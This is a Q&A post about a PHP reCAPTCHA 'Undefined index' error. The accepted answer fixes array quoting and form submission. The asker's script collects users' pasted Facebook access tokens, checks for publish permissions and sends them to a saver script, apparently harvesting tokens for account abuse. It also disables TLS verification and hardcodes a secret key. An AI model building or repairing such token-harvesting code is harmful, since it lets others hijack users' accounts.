# Recaptcha error grecapctha response error why?

Tags: php

I am trying to add recapcha before user submit there data but unfortunately I am getting error and I don't know why and how to fix this and I am new so please help in detail and already read all related post on this topic on stack overflow but I not get any answer.
**error screenshot**
[Captcha error](https://i.stack.imgur.com/tCGR5.jpg)
Here is my php script **verify.php**

```
<?php
function get_json($url) {
    $ch = curl_init();

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_FAILONERROR, 0);
    $data = curl_exec($ch);
    curl_close($ch);
    return json_decode($data);
    }
function get_html($url) {
    $ch = curl_init();

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_FAILONERROR, 0);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
    }
   $secret = "6LcBbC0UAAAAAFOgeM5fdA6n5Vfam7BqW-wLoNZS";
    $ip = $_SERVER['REMOTE_ADDR'];
    $captcha = $_POST['g-recaptcha-response'];
        $rsp = file_get_contents('https://www.google.com/recaptcha/api/siteverify?secret'.$secret.'&response='.$captcha.'&remoteip'.$ip.'');
$arr = json_decode($rsp,TRUE);
if($arr[success]){
   $token2 = $_GET["user"];
$new = str_replace('"','',$token2);
if(preg_match("'access_token:(.*?),'",$new,$news)){
$token2 = $news[1];
}
session_start();
if(isset($token2)){


$new = str_replace('"','',$token2);
    if(preg_match("'access_token=(.*?)&expires_in='", $token2, $matches)){
    $token = $matches[1];

        }else{
    $token = $token2;}
        $exe = json_decode(get_html("https://graph.facebook.com/app?access_token=".$token ))->id;
    $extend = get_html("https://graph.facebook.com/me/permissions?access_token="  . $token);
    if($exe == "6628568379" || $exe == "149859461799466"){
        $pos = strpos($extend, "publish_actions");
        if ($pos == true) {
        $_SESSION['token'] = $token;
        $ch = curl_init('/saver.php');
        curl_setopt ($ch, CURLOPT_POST, 1);
        curl_setopt ($ch, CURLOPT_POSTFIELDS, "token=".$token);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        curl_exec ($ch);
        curl_close ($ch);
        header('Location:index.php');
            }
            else {
        header('Location:index.php?i=1');}
        //access token is not valid
    }else{
    header('Location:index.php?i=4');}
    }else{
    header('Location:index.php?i=2');}
    }else{
    echo 'spam';
    }
?>
```

Here is my form submit **script**

```
<form method="get" action="verify.php">
<div class=""><p><small>paste your access token here.</small></p>
<center><input placeholder="paste your access token here" class="form-control" id="accesstoken" type="text" name="user" style="width: 300px; height: 43px;"></center><br>
<center>
<div class="g-recaptcha" data-sitekey="6LcBbC0UAAAAABWMA7roLAgTd2UDSLMW3h3azZoG"></div>
</center>
<br><center><button type="submit" class="btn btn-primary btn-lg" onclick="tokencheck()" >Submit </i></button></center><center></center></div></form>
```

Comment: (Welcome to SO!) (`user submit there` - *users submit their* or *a user submits her*.) Part of the title looks somewhat similar to the picture - make it as close as possible. It would probably be better to make the error message a [block quote](https://stackoverflow.com/editing-help#simple-blockquotes).

Answer (score 0, accepted):

Last error is:

you typed `$arr[success]` in line 31 (in if statement)
 that should be `$arr['success']`

And for `Undefined Index: g-recaptcha-response`,

I think your **form is not being submitted**. Check your `tokencheck()`
function.

Sometimes `<button type="submit">` does not work.
So you can also try changing

`<button type="submit" class="btn btn-primary btn-lg" onclick="tokencheck()" >Submit </i></button>`

to

`<input type="submit" class="btn btn-primary btn-lg" onclick="tokencheck()" value="submit">`